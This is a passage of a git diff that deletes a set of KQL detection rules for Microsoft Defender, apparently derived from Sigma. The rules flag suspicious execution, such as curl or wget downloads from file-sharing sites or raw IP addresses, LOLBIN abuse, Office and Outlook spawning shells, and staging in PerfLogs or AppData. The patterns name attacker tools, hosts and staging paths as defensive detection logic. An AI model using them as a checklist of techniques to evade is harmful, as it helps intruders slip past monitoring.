-// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
-// Tags: attack.execution, attack.t1059
-DeviceFileEvents
-| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql b/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
deleted file mode 100644
index 99d431f0..00000000
--- a/Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
-// Tags: attack.defense_evasion, attack.execution
-DeviceFileEvents
-| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql
deleted file mode 100644
index 7514d439..00000000
--- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql
deleted file mode 100644
index bdaf9ef9..00000000
--- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql
deleted file mode 100644
index e3c7add6..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql
deleted file mode 100644
index 4a82ac5a..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql
deleted file mode 100644
index b0c196f8..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\"))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql b/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql
deleted file mode 100644
index b434440a..00000000
--- a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE")
\ No newline at end of file
diff --git a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql b/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql
deleted file mode 100644
index 3dac4b9b..00000000
--- a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/12/15
-// Level: high
-// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%"))
\ No newline at end of file
diff --git a/Execution/Suspicious_HH.EXE_Execution.kql b/Execution/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Execution/Suspicious_HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Execution/Suspicious_HWP_Sub_Processes.kql b/Execution/Suspicious_HWP_Sub_Processes.kql
deleted file mode 100644
index 7c00588f..00000000
--- a/Execution/Suspicious_HWP_Sub_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
-DeviceProcessEvents
-| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql b/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql
deleted file mode 100644
index 54c067e6..00000000
--- a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/07
-// Level: high
-// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
-// Tags: attack.execution, attack.t1059.001
-DeviceFileEvents
-| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive")
\ No newline at end of file
diff --git a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql b/Execution/Suspicious_LOLBIN_AccCheckConsole.kql
deleted file mode 100644
index 83a2f028..00000000
--- a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/06
-// Level: high
-// Description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -window " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_Microsoft_Office_Child_Process.kql b/Execution/Suspicious_Microsoft_Office_Child_Process.kql
deleted file mode 100644
index 255e5e51..00000000
--- a/Execution/Suspicious_Microsoft_Office_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
-// Date: 2018/04/06
-// Level: high
-// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
-// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\"))
\ No newline at end of file
diff --git a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql b/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql
deleted file mode 100644
index 37f7d4d5..00000000
--- a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
-Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
-Instead they modify the task after creation to include their malicious payload
-
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%")
\ No newline at end of file
diff --git a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql b/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql
deleted file mode 100644
index 796ce58d..00000000
--- a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/17
-// Level: high
-// Description: Detects suspicious mshta process execution patterns
-// Tags: attack.execution, attack.t1106
-DeviceProcessEvents
-| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta")))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Outlook_Child_Process.kql b/Execution/Suspicious_Outlook_Child_Process.kql
deleted file mode 100644
index 7dd75aaa..00000000
--- a/Execution/Suspicious_Outlook_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
-// Date: 2022/02/28
-// Level: high
-// Description: Detects a suspicious process spawning from an Outlook process.
-// Tags: attack.execution, attack.t1204.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"
\ No newline at end of file
diff --git a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 504899dd..00000000
--- a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
